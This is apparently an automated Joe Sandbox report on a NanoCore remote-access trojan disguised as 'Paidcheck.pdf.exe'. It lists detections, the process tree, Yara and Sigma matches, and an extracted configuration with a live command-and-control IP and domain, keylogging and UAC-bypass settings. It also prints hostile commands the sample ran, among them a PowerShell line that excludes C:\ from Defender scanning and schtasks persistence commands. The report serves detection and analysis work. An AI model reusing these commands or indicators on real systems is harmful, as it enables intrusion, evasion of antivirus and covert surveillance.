Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Paidcheck.pdf.exe

Overview

General Information

Sample Name:Paidcheck.pdf.exe
Analysis ID:452385
MD5:ce32e8605adb6c9bb2dcee69fe887b46
SHA1:2ace1fb1e3523768003b61a4a79193214ffafed9
SHA256:7e22f7f21e8798805234be7ac26bad65c1edecb55b051343e0933a68041ce073
Tags:exeNanoCoreRAT
Infos:

Most interesting Screenshot:

Detection

Nanocore
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected Nanocore Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: NanoCore
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Nanocore RAT
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Creates an undocumented autostart registry key
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Suspicious Process Start Without DLL
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses an obfuscated file name to hide its real file extension (double extension)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Antivirus or Machine Learning detection for unpacked file
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Paidcheck.pdf.exe (PID: 4608 cmdline: 'C:\Users\user\Desktop\Paidcheck.pdf.exe' MD5: CE32E8605ADB6C9BB2DCEE69FE887B46)
    • wscript.exe (PID: 1968 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Fimmlfqfvyftboxhdsnydr.vbs' MD5: 7075DD7B9BE8807FCA93ACD86F724884)
      • powershell.exe (PID: 748 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 6096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • RegAsm.exe (PID: 2308 cmdline: C:\Users\user\AppData\Local\Temp\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)
      • schtasks.exe (PID: 5636 cmdline: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp4FE3.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
        • conhost.exe (PID: 5784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • schtasks.exe (PID: 5848 cmdline: 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp5C0A.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
        • conhost.exe (PID: 2292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • RegAsm.exe (PID: 5432 cmdline: C:\Users\user\AppData\Local\Temp\RegAsm.exe 0 MD5: 6FD7592411112729BF6B1F2F6C34899F)
    • conhost.exe (PID: 2992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • dhcpmon.exe (PID: 496 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0 MD5: 6FD7592411112729BF6B1F2F6C34899F)
    • conhost.exe (PID: 484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • dhcpmon.exe (PID: 4300 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' MD5: 6FD7592411112729BF6B1F2F6C34899F)
    • conhost.exe (PID: 1036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "bcd083ef-bf90-4541-bf76-579f377e", "Group": "5g", "Domain1": "217.138.212.57", "Domain2": "annapro.linkpc.net", "Port": 2018, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Disable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Disable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo />\r\n  <Triggers />\r\n  <Principals>\r\n    <Principal id=\"Author\">\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>4</Priority>\r\n  </Settings>\r\n  <Actions Context=\"Author\">\r\n    <Exec>\r\n      <Command>\"#EXECUTABLEPATH\"</Command>\r\n      <Arguments>$(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.486028172.0000000003C21000.00000004.00000001.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
    0000000A.00000002.489583324.0000000006AE0000.00000004.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
    • 0x59eb:$x1: NanoCore.ClientPluginHost
    • 0x5b48:$x2: IClientNetworkHost
    0000000A.00000002.489583324.0000000006AE0000.00000004.00000001.sdmpNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
    • 0x59eb:$x2: NanoCore.ClientPluginHost
    • 0x6941:$s3: PipeExists
    • 0x5be1:$s4: PipeCreated
    • 0x5a05:$s5: IClientLoggingHost
    0000000A.00000002.480862241.0000000002BD1000.00000004.00000001.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
      0000000A.00000002.489612567.0000000006AF0000.00000004.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0x39eb:$x1: NanoCore.ClientPluginHost
      • 0x3a24:$x2: IClientNetworkHost
      Click to see the 44 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      10.2.RegAsm.exe.6aa0000.26.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0x16e3:$x1: NanoCore.ClientPluginHost
      • 0x171c:$x2: IClientNetworkHost
      10.2.RegAsm.exe.6aa0000.26.raw.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
      • 0x16e3:$x2: NanoCore.ClientPluginHost
      • 0x1800:$s4: PipeCreated
      • 0x16fd:$s5: IClientLoggingHost
      10.2.RegAsm.exe.6af0000.31.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0x39eb:$x1: NanoCore.ClientPluginHost
      • 0x3a24:$x2: IClientNetworkHost
      10.2.RegAsm.exe.6af0000.31.raw.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
      • 0x39eb:$x2: NanoCore.ClientPluginHost
      • 0x3b36:$s4: PipeCreated
      • 0x3a05:$s5: IClientLoggingHost
      10.2.RegAsm.exe.6540000.24.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0x4bbb:$x1: NanoCore.ClientPluginHost
      • 0x4be5:$x2: IClientNetworkHost
      Click to see the 148 entries

      Sigma Overview

      AV Detection:

      barindex
      Sigma detected: NanoCoreShow sources
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ProcessId: 2308, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

      E-Banking Fraud:

      barindex
      Sigma detected: NanoCoreShow sources
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ProcessId: 2308, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

      System Summary:

      barindex
      Sigma detected: Suspicious Process Start Without DLLShow sources
      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\user\AppData\Local\Temp\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ParentCommandLine: 'C:\Users\user\Desktop\Paidcheck.pdf.exe' , ParentImage: C:\Users\user\Desktop\Paidcheck.pdf.exe, ParentProcessId: 4608, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ProcessId: 2308
      Sigma detected: Suspicious Script Execution From Temp FolderShow sources
      Source: Process startedAuthor: Florian Roth, Max Altgelt: Data: Command: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Fimmlfqfvyftboxhdsnydr.vbs' , CommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Fimmlfqfvyftboxhdsnydr.vbs' , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: 'C:\Users\user\Desktop\Paidcheck.pdf.exe' , ParentImage: C:\Users\user\Desktop\Paidcheck.pdf.exe, ParentProcessId: 4608, ProcessCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Fimmlfqfvyftboxhdsnydr.vbs' , ProcessId: 1968
      Sigma detected: WScript or CScript DropperShow sources
      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (rule), oscd.community: Data: Command: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Fimmlfqfvyftboxhdsnydr.vbs' , CommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Fimmlfqfvyftboxhdsnydr.vbs' , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: 'C:\Users\user\Desktop\Paidcheck.pdf.exe' , ParentImage: C:\Users\user\Desktop\Paidcheck.pdf.exe, ParentProcessId: 4608, ProcessCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Fimmlfqfvyftboxhdsnydr.vbs' , ProcessId: 1968
      Sigma detected: Non Interactive PowerShellShow sources
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe', CommandLine|base64offset|contains: I~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Fimmlfqfvyftboxhdsnydr.vbs' , ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 1968, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe', ProcessId: 748
      Sigma detected: Possible Applocker BypassShow sources
      Source: Process startedAuthor: juju4: Data: Command: C:\Users\user\AppData\Local\Temp\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ParentCommandLine: 'C:\Users\user\Desktop\Paidcheck.pdf.exe' , ParentImage: C:\Users\user\Desktop\Paidcheck.pdf.exe, ParentProcessId: 4608, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ProcessId: 2308

      Stealing of Sensitive Information:

      barindex
      Sigma detected: NanoCoreShow sources
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ProcessId: 2308, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

      Remote Access Functionality:

      barindex
      Sigma detected: NanoCoreShow sources
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ProcessId: 2308, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Antivirus / Scanner detection for submitted sampleShow sources
      Source: Paidcheck.pdf.exeAvira: detected
      Antivirus detection for dropped fileShow sources
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exeAvira: detection malicious, Label: HEUR/AGEN.1118541
      Found malware configurationShow sources
      Source: 0000000A.00000002.486028172.0000000003C21000.00000004.00000001.sdmpMalware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "bcd083ef-bf90-4541-bf76-579f377e", "Group": "5g", "Domain1": "217.138.212.57", "Domain2": "annapro.linkpc.net", "Port": 2018, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Disable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Disable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n <RegistrationInfo />\r\n <Triggers />\r\n <Principals>\r\n <Principal id=\"Author\">\r\n <LogonType>InteractiveToken</LogonType>\r\n <RunLevel>HighestAvailable</RunLevel>\r\n </Principal>\r\n </Principals>\r\n <Settings>\r\n <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n <AllowHardTerminate>true</AllowHardTerminate>\r\n <StartWhenAvailable>false</StartWhenAvailable>\r\n <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n <IdleSettings>\r\n <StopOnIdleEnd>false</StopOnIdleEnd>\r\n <RestartOnIdle>false</RestartOnIdle>\r\n </IdleSettings>\r\n <AllowStartOnDemand>true</AllowStartOnDemand>\r\n <Enabled>true</Enabled>\r\n <Hidden>false</Hidden>\r\n <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n <WakeToRun>false</WakeToRun>\r\n <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n <Priority>4</Priority>\r\n </Settings>\r\n <Actions Context=\"Author\">\r\n <Exec>\r\n <Command>\"#EXECUTABLEPATH\"</Command>\r\n <Arguments>$(Arg0)</Arguments>\r\n </Exec>\r\n </Actions>\r\n</Task"}
      Multi AV Scanner detection for dropped fileShow sources
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exeReversingLabs: Detection: 32%
      Yara detected Nanocore RATShow sources
      Source: Yara matchFile source: 10.2.RegAsm.exe.5f60000.23.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.3c3dc19.10.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.3c395f0.11.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3c69950.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.5f64629.22.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.5f60000.23.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.3c395f0.11.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.3c24c35.9.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3c91970.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3ce1990.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3c69950.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3c91970.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3eceb18.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.3d596b5.14.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.3d4d481.12.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3e36bd0.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.3d6dce2.13.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3ce1990.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0000000A.00000002.486028172.0000000003C21000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.480862241.0000000002BD1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.306569073.0000000003C69000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.475784667.0000000000402000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.488145685.0000000005F60000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.486159057.0000000003C9E000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.306631501.0000000003CE1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: Paidcheck.pdf.exe PID: 4608, type: MEMORY
      Machine Learning detection for dropped fileShow sources
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exeJoe Sandbox ML: detected
      Machine Learning detection for sampleShow sources
      Source: Paidcheck.pdf.exeJoe Sandbox ML: detected
      Source: 10.2.RegAsm.exe.5f60000.23.unpackAvira: Label: TR/NanoCore.fadte
      Source: 10.2.RegAsm.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: Paidcheck.pdf.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
      Source: Paidcheck.pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
      Source: Binary string: RegAsm.pdb source: dhcpmon.exe, RegAsm.exe.0.dr
      Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: RegAsm.exe, 0000000A.00000002.481024658.0000000002C47000.00000004.00000001.sdmp
      Source: Binary string: RegAsm.pdb4 source: RegAsm.exe, 0000000A.00000002.479021599.0000000000EC2000.00000004.00000020.sdmp, RegAsm.exe, 00000011.00000002.325398042.0000000000CA2000.00000002.00020000.sdmp, dhcpmon.exe, 00000013.00000000.322931989.00000000002A2000.00000002.00020000.sdmp, dhcpmon.exe, 00000015.00000000.334603613.00000000008A2000.00000002.00020000.sdmp, RegAsm.exe.0.dr
      Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: RegAsm.exe, 0000000A.00000002.489612567.0000000006AF0000.00000004.00000001.sdmp
      Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegAsm.exe, 0000000A.00000002.481024658.0000000002C47000.00000004.00000001.sdmp
      Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: RegAsm.exe, 0000000A.00000002.481024658.0000000002C47000.00000004.00000001.sdmp
      Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegAsm.exe, 0000000A.00000002.489583324.0000000006AE0000.00000004.00000001.sdmp
      Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: RegAsm.exe, 0000000A.00000002.481024658.0000000002C47000.00000004.00000001.sdmp
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]10_2_06CC0C90
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]10_2_06CC0CA0

      Networking:

      barindex
      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49704 -> 217.138.212.57:2018
      C2 URLs / IPs found in malware configurationShow sources
      Source: Malware configuration extractorURLs: annapro.linkpc.net
      Source: Malware configuration extractorURLs: 217.138.212.57
      Source: global trafficTCP traffic: 192.168.2.3:49704 -> 217.138.212.57:2018
      Source: Joe Sandbox ViewASN Name: M247GB M247GB
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: powershell.exe, 0000000B.00000003.376733884.0000000009675000.00000004.00000001.sdmpString found in binary or memory: http://crl.micr
      Source: RegAsm.exe, 0000000A.00000002.479021599.0000000000EC2000.00000004.00000020.sdmpString found in binary or memory: http://crl.microso
      Source: RegAsm.exe, 0000000A.00000002.479021599.0000000000EC2000.00000004.00000020.sdmpString found in binary or memory: http://crl.microsofX
      Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
      Source: RegAsm.exe, 0000000A.00000002.489583324.0000000006AE0000.00000004.00000001.sdmpString found in binary or memory: http://google.com
